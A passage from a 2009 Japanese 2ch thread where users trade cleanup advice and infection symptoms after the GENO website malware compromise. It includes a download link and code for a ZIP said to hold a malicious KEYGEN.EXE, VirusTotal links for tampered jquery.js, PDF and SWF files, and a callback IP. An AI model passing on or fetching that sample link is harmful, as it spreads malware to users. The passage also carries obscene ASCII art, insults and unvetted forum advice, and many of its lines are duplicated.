Cドライブだけをフォーマットする形でお茶を濁すのもアリかと。
その上でXPやVistaを再インストールが完了した後に最新定義ファイルに更新したアンチウィルスソフトで
フルスキャンしてウィルスの残留の有無をチェックしたりして。
ぶっちゃけ、一度それで試して駄目ならその時にもう一度再セットアップを行って全部のドライブを消せばよいんだし。
二度手間になる可能性はあるけどね。
あくまで一般論でしか言えないけど、可能であれば当然全部フォーマットしなおすべきだし、
可能であればパーティションも再度切りなおすべき。
また、RAIDを組んでてストライピングやミラーリングを行っている場合は
パーティションを切りなおす以前にRAIDボリュームまで新たに組みなおすべき。
基本的にBIOSから認識される順で、1台目のHDDにマスターブートレコードが保存されているんだけど
その部分にも感染するウィルスの場合だと本当に厄介で、
原則的にはパーティションから切りなおして全てのドライブをフォーマットする感じになる。
今の所判ってる範囲ではこのGenoウィルスはそこまでしないウィルスだとは思うし、
単純にXPのシステム復元から復帰出来た人もいる様なので、そこまで気にしなくても大丈夫だとは思うけどね。
それに最近はUSBメモリの普通のブートレコードにも感染するウィルスとか、色々ある位なんで、
本来、原理原則に則って完璧に対処するのであれば、2台目等の複数のHDDを搭載している場合も
可能な限り一通りパーティションを切りなおす所から始めたほうが良いかと。
基本的にパーティションを切りなおす事で正しいブートレコードに書き換えられるんで。
ただ、実際にはどうしても消せない秘蔵エロ動画等のデータがDドライブにある等、止むを得ない場合は
キーロガー等が最悪残ってしまう等のリスクを承知の上で
Cドライブだけをフォーマットする形でお茶を濁すのもアリかと。
その上でXPやVistaを再インストールが完了した後に最新定義ファイルに更新したアンチウィルスソフトで
フルスキャンしてウィルスの残留の有無をチェックしたりして。
ぶっちゃけ、一度それで試して駄目ならその時にもう一度再セットアップを行って全部のドライブを消せばよいんだし。
二度手間になる可能性はあるけどね。
724 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:28:55
悔しいですっ!!
725 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:30:55
なげえ
2-4パラグラフは蛇足だな
2-4パラグラフは蛇足だな
726 : ◆W07s5cWHb. :2009/04/10(金) 01:35:39
うんうんw
酔ってるから無駄に長文で無駄に駄文になってるわw
酔ってるから無駄に長文で無駄に駄文になってるわw
727 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:38:54
誰か>>723をデフラグしてきて
728 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:40:09
>>727
不良セクタがあるから無理
不良セクタがあるから無理
729 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:41:04
>>720
サンクス
けどパスが分からん
http://www.btfree.info/file.php?action-get.html
Code by:c418478c216f027
ちなみにリンク先は普通のダウンロードサイト
サンクス
けどパスが分からん
http://www.btfree.info/file.php?action-get.html
Code by:c418478c216f027
ちなみにリンク先は普通のダウンロードサイト
730 : ◆W07s5cWHb. :2009/04/10(金) 01:41:04
>>727
うちはSSDを使ってるからデフラグは無理w
うちはSSDを使ってるからデフラグは無理w
731 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:42:26
>>730
それも効果あるって話だが
それも効果あるって話だが
732 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:42:57
>728
じゃあローレベルフォーマットで
じゃあローレベルフォーマットで
733 : ◆W07s5cWHb. :2009/04/10(金) 01:44:05
734 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:44:37
GENOウイルスが人体に与える影響も解析したほうがいいな
735 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:46:26
>>733
zipの解凍パスだで?
zipの解凍パスだで?
736 : ◆W07s5cWHb. :2009/04/10(金) 01:50:12
>>731
実は何回かSSDにもデフラグ行ってるw
ただ、自作PC板のSSDスレ等で半分誤って書かれているのは
既存のデフラグソフトとは違って、
SSDの内部的に配置までちゃんと書き換えてくれる、
いわばSSD対応デフラグみたいな奴じゃないと殆ど意味無いんですよ。
SSDはHDDと違って、コントローラーがテキトーに割り振って
OSや通常のデフラグソフト上から見える位置とは全然異なる部分にデータを書き込んでるんで、
テキトーなコントローラーに騙されない
賢いデフラグソフトじゃないとSSDでは無意味なの。
実は何回かSSDにもデフラグ行ってるw
ただ、自作PC板のSSDスレ等で半分誤って書かれているのは
既存のデフラグソフトとは違って、
SSDの内部的に配置までちゃんと書き換えてくれる、
いわばSSD対応デフラグみたいな奴じゃないと殆ど意味無いんですよ。
SSDはHDDと違って、コントローラーがテキトーに割り振って
OSや通常のデフラグソフト上から見える位置とは全然異なる部分にデータを書き込んでるんで、
テキトーなコントローラーに騙されない
賢いデフラグソフトじゃないとSSDでは無意味なの。
737 : ◆W07s5cWHb. :2009/04/10(金) 01:52:59
738 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:53:50
>>736
誰かさんの逃避ダイアリーに書いてあったな
誰かさんの逃避ダイアリーに書いてあったな
739 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:55:37 BE:918273299-2BP(0)
740 : ◆W07s5cWHb. :2009/04/10(金) 01:59:02
>>735
今恐る恐る踏んでZIPを落としたけどなんか感染した当時と異なってる感じだな。
今はなんかZIP中のKEYGEN.EXEにパスが掛かってるけど、そもそもあんなんじゃなかった筈。
ZIP自体がリプレースされているのかも。
今恐る恐る踏んでZIPを落としたけどなんか感染した当時と異なってる感じだな。
今はなんかZIP中のKEYGEN.EXEにパスが掛かってるけど、そもそもあんなんじゃなかった筈。
ZIP自体がリプレースされているのかも。
741 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:01:44
ああ、クリーンインストール終わって
やっと復帰したと思ったら今度はPCIDevice認識しないだRealTEKのオンボード
音源から音が出ないやらで大変です。パソ工のBTOパソコンは再インストール時に
音源を殺す設定がついているのでしょうかね。
やっと復帰したと思ったら今度はPCIDevice認識しないだRealTEKのオンボード
音源から音が出ないやらで大変です。パソ工のBTOパソコンは再インストール時に
音源を殺す設定がついているのでしょうかね。
742 : ◆W07s5cWHb. :2009/04/10(金) 02:03:24
ちなみに>>729のZIPもノートン先生無反応だな。
念のため扱いには十分注意してね。
念のため扱いには十分注意してね。
743 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:06:56
>>740
これと間違ってね?
http://www.btfree.info/file.php?action-get.html
Code by: d5ddf2d3204c8f4
>>729はウイルスじゃないぞw
これと間違ってね?
http://www.btfree.info/file.php?action-get.html
Code by: d5ddf2d3204c8f4
>>729はウイルスじゃないぞw
744 : ◆W07s5cWHb. :2009/04/10(金) 02:08:43
>>741
流石にそこまではこのスレでは本来フォロー出来ない事だけど、酔って気分が良いから特別に。
↓の蟹さん謹製のドライバでも駄目なの?
ttp://www.realtek.com.tw/downloads/downloadsCheck.aspx?Langid=4&PNid=24&PFid=24&Level=4&Conn=3&DownTypeID=3&GetDown=false
>>743
あ、そうかもw
流石にそこまではこのスレでは本来フォロー出来ない事だけど、酔って気分が良いから特別に。
↓の蟹さん謹製のドライバでも駄目なの?
ttp://www.realtek.com.tw/downloads/downloadsCheck.aspx?Langid=4&PNid=24&PFid=24&Level=4&Conn=3&DownTypeID=3&GetDown=false
>>743
あ、そうかもw
745 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:09:15 BE:340101465-2BP(0)
746 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:10:11
>>721
もし問題がおきてから、C→他のドライブにファイルの移動とか
やってたらそのファイルに感染がある場合、広がる可能性もあるんじゃない?
基本パーティション切ってんなら、隔絶した空間だよな?(間違ってるかこの認識?)
もし問題がおきてから、C→他のドライブにファイルの移動とか
やってたらそのファイルに感染がある場合、広がる可能性もあるんじゃない?
基本パーティション切ってんなら、隔絶した空間だよな?(間違ってるかこの認識?)
747 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:12:21
あ、上で詳しい解説あったか
失礼
失礼
749 : ◆W07s5cWHb. :2009/04/10(金) 02:15:06
750 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:15:20 BE:612182669-2BP(0)
751 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:18:56 BE:68020823-2BP(0)
ちょwwwww数字とかwwwww
752 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:21:27
とりあえずバックアップしたいんなら
感染が疑われるドライブ or パーティションからシステムを起動させるのを避けて
別のドライブ or パーティションからOS立ち上げて作業したほうが無難
感染が疑われるドライブ or パーティションからシステムを起動させるのを避けて
別のドライブ or パーティションからOS立ち上げて作業したほうが無難
753 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:23:09 BE:102030833-2BP(0)
酔っぱらっるって
Pikazipが使えてなんでどう考えてもkeygenっぽくない(コンソールアプリっぽい)ファイル開いちまうんだよwww
ちなみにばっちりウイルスでした
Pikazipが使えてなんでどう考えてもkeygenっぽくない(コンソールアプリっぽい)ファイル開いちまうんだよwww
ちなみにばっちりウイルスでした
754 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:23:33
おやすみ 大体出尽くした感じだね
またなんかあったら繰る歯
またなんかあったら繰る歯
755 :名無しさん@お腹いっぱい。:2009/04/10(金) 02:26:23
756 : ◆W07s5cWHb. :2009/04/10(金) 02:27:56
>>752
だね。
てか、複数台のPCがある奴なら別のPCでアンチウィルスソフトのレスキューブートCD等をこしらえて、
再起動前にそいつでCD起動してブートセクタから何から一切合財スキャンしてチェックするのが望ましいね。
だね。
てか、複数台のPCがある奴なら別のPCでアンチウィルスソフトのレスキューブートCD等をこしらえて、
再起動前にそいつでCD起動してブートセクタから何から一切合財スキャンしてチェックするのが望ましいね。
757 : ◆W07s5cWHb. :2009/04/10(金) 02:32:28
>>753
うちの環境だとPikaZipは入れてなくてLhaplusでしかパス解析出来ないけど、
そもそも酔ってるのに一々そんな事までして食らう訳ないだろw
ほぼワンクリックで食らったんだってのw
>>754
おやすも。
うちの環境だとPikaZipは入れてなくてLhaplusでしかパス解析出来ないけど、
そもそも酔ってるのに一々そんな事までして食らう訳ないだろw
ほぼワンクリックで食らったんだってのw
>>754
おやすも。
758 :名無しさん@お腹いっぱい。:2009/04/10(金) 07:47:50
俺おそらく感染してるんだけどsqlsodbc.chmはMD5:f639afde02547603a3d3930ee4bf8c12だった
svchostは5個中2個がNETWORKSERVICEでうごいてる
ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
svchostは5個中2個がNETWORKSERVICEでうごいてる
ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
759 :名無しさん@お腹いっぱい。:2009/04/10(金) 07:51:25
判定の仕方がいまだにあいまいなのは非常に困った
760 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:02:00
◆W07s5cWHb. が、いろんなレスしてる俺カッコいい!!
こんな事も知ってる俺すごい!と自己陶酔してるのがきもいネ!
こんな事も知ってる俺すごい!と自己陶酔してるのがきもいネ!
761 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:04:53
妬み
762 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:14:45
>>757
そろそろ巣に帰れば?
そろそろ巣に帰れば?
763 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:17:40
でも何一つ解決してないよ
764 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:22:31
>>763
問題を解決する上で自称ニュー速民は必要かね?w
問題を解決する上で自称ニュー速民は必要かね?w
766 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:27:04
問題のjsファイルも殆ど対応したし
あらゆるプロセスを乗っ取ることもわかったしこれ以上なにをしろと
あらゆるプロセスを乗っ取ることもわかったしこれ以上なにをしろと
767 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:27:59
感染判定の確定情報ってある?
768 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:31:27
>>758
オンラインスキャンがハングで落ちるわけでないならそのハッシュは正常なので感染を何らかの理由で防いでるのかも
オンラインスキャンがハングで落ちるわけでないならそのハッシュは正常なので感染を何らかの理由で防いでるのかも
769 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:49:43
770 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:52:34
>>758
> ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
俺も同じく、途中でエラー。
そこで、カスペルスキースキャンエンジンを採用している、niftyオンラインスキャンに移動、
ここでは問題なかった。
> ちなみにカスペルスキーのオンラインスキャンのアップデートが途中でエラーでてできない
俺も同じく、途中でエラー。
そこで、カスペルスキースキャンエンジンを採用している、niftyオンラインスキャンに移動、
ここでは問題なかった。
771 :名無しさん@お腹いっぱい。:2009/04/10(金) 08:53:50
772 :名無しさん@お腹いっぱい。:2009/04/10(金) 09:06:27
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/209
209 名前: 雪割草ユキワリソウ(香川県)[sage] 投稿日:2009/04/09(木) 18:25:27.33 ID:Dyr5cr7f
楽天のショップ何個か感染しておりますな
↑これの真偽はどんなもんでしょ?
http://tsushima.2ch.net/test/read.cgi/news/1239241638/209
209 名前: 雪割草ユキワリソウ(香川県)[sage] 投稿日:2009/04/09(木) 18:25:27.33 ID:Dyr5cr7f
楽天のショップ何個か感染しておりますな
↑これの真偽はどんなもんでしょ?
774 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:26:16
>>598
直リンすんなキモブタ
直リンすんなキモブタ
あ、そういや俺もカスペルスキーオンラインスキャンが出来ないわ
776 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:33:20
msとアンチウイルスサイトに繋がりません
かんせんですか?
かんせんですか?
777 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:36:45
778 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:44:43
まったく駄目です
あとイーモバイルで接続すると凄いポートスキャンでCPU使用率100パーになります
あとイーモバイルで接続すると凄いポートスキャンでCPU使用率100パーになります
779 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:47:26
てst
780 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:51:47
>>772
正確には感染していた、の方が正しいんじゃない?
www.rakuten.ne.jp/gold/i-na/が感染してたと話題が上がってて今は何事もなかったように営業してるし、
慌てて楽天がなんらかの処置を施したのかと
楽天のサーバーがハッキングされたとして他の店も同時多発的にやられてたとしても不思議じゃないよ
正確には感染していた、の方が正しいんじゃない?
www.rakuten.ne.jp/gold/i-na/が感染してたと話題が上がってて今は何事もなかったように営業してるし、
慌てて楽天がなんらかの処置を施したのかと
楽天のサーバーがハッキングされたとして他の店も同時多発的にやられてたとしても不思議じゃないよ
781 :名無しさん@お腹いっぱい。:2009/04/10(金) 10:54:24
各サイトが対策を施すのは待つしかないとして・・・
ウィルス対策ソフトメーカーの対応状況はどうなってるか誰か教えて。
ウィルス対策ソフトメーカーの対応状況はどうなってるか誰か教えて。
782 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:00:49
土曜のウィルス報告が上がる前にIE/firefox/chromeで突撃してすべて落ちたけど無害ですんだ
XPhomeのavast常駐でreaderが9.0.0だった
XPhomeのavast常駐でreaderが9.0.0だった
783 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:13:09
784 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:26:52
785 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:27:53
crestronjapan.com 、対策されてるっぽくね?
既出?
既出?
786 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:35:49
まだ残ってる
787 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:36:01
無能な鯖管は消えろ!
788 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:46:23
アヴァイラが親玉と思われるをファイル解析後、個人情報を盗むPSW系のトロイという結果がでてるな
カスペじゃ無害と言われたのに
リネームしてもう一回提出してみる
大きな進展w
カスペじゃ無害と言われたのに
リネームしてもう一回提出してみる
大きな進展w
789 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:55:06
>>786
まじ? URLどこ?
まじ? URLどこ?
790 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:55:58
791 :名無しさん@お腹いっぱい。:2009/04/10(金) 11:56:02
>>789 トップページ
www.crestronjapan●com/
www.crestronjapan●com/
792 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:01:54
まだ残ってる
ラトビアに飛ばされた
ラトビアに飛ばされた
793 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:03:54
逆アセンブルとか言ってる痛い子がちらほらと
794 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:04:13
まだ気付いてないのかな?
連絡してあげたいが、PC素人だから無理ぽ('A`)
連絡してあげたいが、PC素人だから無理ぽ('A`)
795 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:07:32
796 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:08:58
変造jquery.js
ttp://www.virustotal.com/jp/analisis/638f74f6add00d943690e13a4ca8a397
変造PDF(id=2で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6d7595324ab9c58757cf774ae88c6a98
ttp://www.virustotal.com/jp/analisis/265f9b488b37b132a6f980fc83339bd7
変造SWF(id=3で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6020c97f34eb26ca4ad923b8ff2dc52f
exe(id=10で落ちてくるもの)
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a (現物がないため古い結果)
ttp://www.virustotal.com/jp/analisis/7aabab7fb0aa74ddf685b72c7f4fa490
ttp://www.virustotal.com/jp/analisis/1f8a1593c5be38312b7d19ddb7a3ef34
ttp://www.virustotal.com/jp/analisis/638f74f6add00d943690e13a4ca8a397
変造PDF(id=2で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6d7595324ab9c58757cf774ae88c6a98
ttp://www.virustotal.com/jp/analisis/265f9b488b37b132a6f980fc83339bd7
変造SWF(id=3で落ちてくるもの)
ttp://www.virustotal.com/jp/analisis/6020c97f34eb26ca4ad923b8ff2dc52f
exe(id=10で落ちてくるもの)
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a (現物がないため古い結果)
ttp://www.virustotal.com/jp/analisis/7aabab7fb0aa74ddf685b72c7f4fa490
ttp://www.virustotal.com/jp/analisis/1f8a1593c5be38312b7d19ddb7a3ef34
11:59:08のログから
ZoneAlarm Security Suite は、あなたのコンピュータから
リモート コンピュータ: IP アドレス 94.247.2.195、ポート 80 への通信をブロックしました。
この警告は、ZoneAlarm Security Suite が完全に開始する前にプログラムがインターネットへの
接続をすると発生することがあります。
ZoneAlarm Security Suite は、あなたのコンピュータから
リモート コンピュータ: IP アドレス 94.247.2.195、ポート 80 への通信をブロックしました。
この警告は、ZoneAlarm Security Suite が完全に開始する前にプログラムがインターネットへの
接続をすると発生することがあります。
798 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:09:45
>>795
そうなんだ、すごい会社だね
そうなんだ、すごい会社だね
799 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:13:32
800 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:14:06
会社によっては自社ホームページをスタートページに設定しているところもあるだろうに
この社内ではウイルスが蔓延していないのか?
この社内ではウイルスが蔓延していないのか?
801 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:18:00
xp使用、旧tepco光、バッファローの有線ルータ
ポート445無効にしたらネット接続出来なくなったため
元に戻したいのですが、どれを選べばいいでしょうか。
システムとか要求とか自動とかあるので
無効以外でこれにしとけというのはありますでしょうか
ポート445無効にしたらネット接続出来なくなったため
元に戻したいのですが、どれを選べばいいでしょうか。
システムとか要求とか自動とかあるので
無効以外でこれにしとけというのはありますでしょうか
802 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:19:41
803 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:23:01
ポッポー (´ \ | __________/ヽ /
.l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|――||// /| < 壊 コ > ヽ .....:::::::::
─────────< れ ン >──────────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
.l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|――||// /| < 壊 コ > ヽ .....:::::::::
─────────< れ ン >──────────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
804 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:23:37
_,,....,,_ _人人人人人人人人人人人人人人人_
-''":::::::::::::`''> ゆっくり オマンコ みていってね!! <
ヽ::::::::::::::::::::: ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
|::::::;ノ´ ̄\:::::::::::\_,. -‐ァ __ _____ ______
|::::ノ ヽ、ヽr-r'"´ (.__ ,´ _,, '-´ ̄ ̄`-ゝ 、_ イ、
_,.!イ_ _,.ヘーァ'二ハ二ヽ、へ,_7 'r ´ ヽ、ン、
::::::rー''7コ-‐'"´ ; ', `ヽ/`7 ,'==─- -─==', i
r-'ァ'"´/ /! ハ ハ ! iヾ_ノ i イ iゝ、イ人レ/_ルヽイ i |
!イ´ ,' | /__,.!/ V 、!__ハ ,' ,ゝ レリイi (ヒ_] ヒ_ン ).| .|、i .||
`! !/レi' (ヒ_] ヒ_ン レ'i ノ !Y!"" ,___, "" 「 !ノ i |
,' ノ !'" ,___, "' i .レ' L.',. ヽ _ン L」 ノ| .|
( ,ハ ヽ _ン 人! | ||ヽ、 ,イ| ||イ| /
,.ヘ,)、 )>,、 _____, ,.イ ハ レ ル` ー--─ ´ルレ レ´
805 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:24:00
806 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:25:28
>>799
糞虫以下
糞虫以下
807 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:41:17
だいぶ静かになった?
808 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:43:54
>>799
なるほど、これがセキュ板に常駐する基地外ウイルスか
なるほど、これがセキュ板に常駐する基地外ウイルスか
809 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:47:24
>>808
この板は年中ウイルスが蔓延ってるぜ
この板は年中ウイルスが蔓延ってるぜ
810 :名無しさん@お腹いっぱい。:2009/04/10(金) 12:56:31
そんなに似てねーぞ
811 : ◆W07s5cWHb. :2009/04/10(金) 13:06:00
>>807
まだまだでしょ。
ただ、これ、アンチウィルスソフトが殆ど対応したから新たな被害者はあまり出ないと思うけど、
鯖側の感染数が減らないと、逆にブラクラ同然のサイトが増えるだけなんだよね。
管理者不在公開鯖がこれだけ多いと厳しいな。
未だになんのアクションもしないで放置している某者みたいなところ、結構多いと思うよ。
アフォしかいないから杜撰な管理→杜撰だからクラックされる→アフォだから対処不能→放置
この最悪コンボなんだよな。
本当なら行政処分しないといけないレベル。
まだまだでしょ。
ただ、これ、アンチウィルスソフトが殆ど対応したから新たな被害者はあまり出ないと思うけど、
鯖側の感染数が減らないと、逆にブラクラ同然のサイトが増えるだけなんだよね。
管理者不在公開鯖がこれだけ多いと厳しいな。
未だになんのアクションもしないで放置している某者みたいなところ、結構多いと思うよ。
アフォしかいないから杜撰な管理→杜撰だからクラックされる→アフォだから対処不能→放置
この最悪コンボなんだよな。
本当なら行政処分しないといけないレベル。
812 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:32:04
三日間も放置した挙句、キャッシュをクリアで
事を済まそうとする適当さが許せん。
事を済まそうとする適当さが許せん。
813 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:44:28
次スレはいらないから建てるなよ
そろそろ過疎ってくるしここIDでないから。
変なのも湧くしやるなら他でやれ
そろそろ過疎ってくるしここIDでないから。
変なのも湧くしやるなら他でやれ
814 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:46:46
815 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:51:27
>>813
わかりました、もう次スレ用意しろって事ですね?
わかりました、もう次スレ用意しろって事ですね?
816 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:53:52
関係ないけどHotmail.comがおかしくなってるな。
817 : ◆W07s5cWHb. :2009/04/10(金) 14:03:02
818 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:03:33
819 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:05:13
なにこいつw
820 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:05:54
まだ懲りないらしい
821 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:06
うんこ
822 : ◆W07s5cWHb. :2009/04/10(金) 14:06:15
ただの基地外、もしくは工作員だって田宮さんが言ってた
823 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:18
ですよねー
824 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:06:59
変なとこにレスしてしまった
825 : ◆W07s5cWHb. :2009/04/10(金) 14:09:29
まぁ、これだけスレに常駐してる奴が居るんだから
火消ししても無駄だと思うよ。
多分、雑談スレ化しながら各Genoスレのヲチスレとなったり
新たに食らった痛いサイトを嘲笑うスレになると思うw
火消ししても無駄だと思うよ。
多分、雑談スレ化しながら各Genoスレのヲチスレとなったり
新たに食らった痛いサイトを嘲笑うスレになると思うw
826 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:12:00
このスレを見ているといかにセキュ板の住民が情報強者かわかる
ν速なんか情弱しかいないからなぁ
やっぱりみんなで守っていかないと駄目だな。
今のν速はw
ν速なんか情弱しかいないからなぁ
やっぱりみんなで守っていかないと駄目だな。
今のν速はw
827 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:12:03
828 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:14:46
しねとかいっちゃだめだよー
なかよくね
なかよくね
829 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:15:14
GENOの営業が再開した月曜日から各地のGENOスレで
もういらないだろ的な書き込みを始めてるんでスルーしてあげてくれ
もういらないだろ的な書き込みを始めてるんでスルーしてあげてくれ
830 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:20:46
マカフィーは対応してるの?
ウィルス名は何?
ウィルス名は何?
831 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:22:03
832 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:22:57
しかし想像以上にタチの悪いウイルスだな。
833 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:35:37
3日の夜にGeno踏んで7日に知ったんだが、もらってんのかな?火狐2でflashもadbeも最新ではなかった。
sqlsodbc.chmはハッシュ改変なし。火狐もIEも落ちない。カスペルではnyとshareが不正なアドオンとでて、E-mailワームが1個でてそのファイルは削除。トロイは出なかった。コマンドプロントは7日にあけちゃったけど、まずかったのか。
気になるのが、火狐で見てて、何も開いたりしてないのに、1秒置きにCPU(セレM420)使用率が7〜100%間を行き来するんだけど。潜伏してて何かされてるって可能性ある?
sqlsodbc.chmはハッシュ改変なし。火狐もIEも落ちない。カスペルではnyとshareが不正なアドオンとでて、E-mailワームが1個でてそのファイルは削除。トロイは出なかった。コマンドプロントは7日にあけちゃったけど、まずかったのか。
気になるのが、火狐で見てて、何も開いたりしてないのに、1秒置きにCPU(セレM420)使用率が7〜100%間を行き来するんだけど。潜伏してて何かされてるって可能性ある?
834 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:45:39
>>833
もう感染してるじゃないのか?
もう感染してるじゃないのか?
たまにDEPでexproler.exeが落ちてシステムの復元も出来ない
オワタ?
オワタ?
836 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:49:25
>>833,835
もうマジで、クリーンインストしたほうがいいと思うよ。
もうマジで、クリーンインストしたほうがいいと思うよ。
837 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:50:46
838 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:55:28
割れ房はアップデートがそもそも出来ない件
839 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:56:40
>>837
windowsアップデートならできる
windowsアップデートならできる
840 : ◆W07s5cWHb. :2009/04/10(金) 14:56:48
841 :名無しさん@お腹いっぱい。:2009/04/10(金) 14:59:09
フリーでDtoD、リカバリー領域をHDDに作成するツールないかな・・・
ドライバ、ソフト入れなおすの面倒なんだぜ
ドライバ、ソフト入れなおすの面倒なんだぜ
842 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:02:18
843 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:02:51
844 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:03:46
845 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:04:12
全容がわからないってのは不気味だな
846 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:05:42
847 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:09:00
今から踏もうと思う
XP SP2パッチなし
Flash最新版
adobe readerは入れてない
XP SP2パッチなし
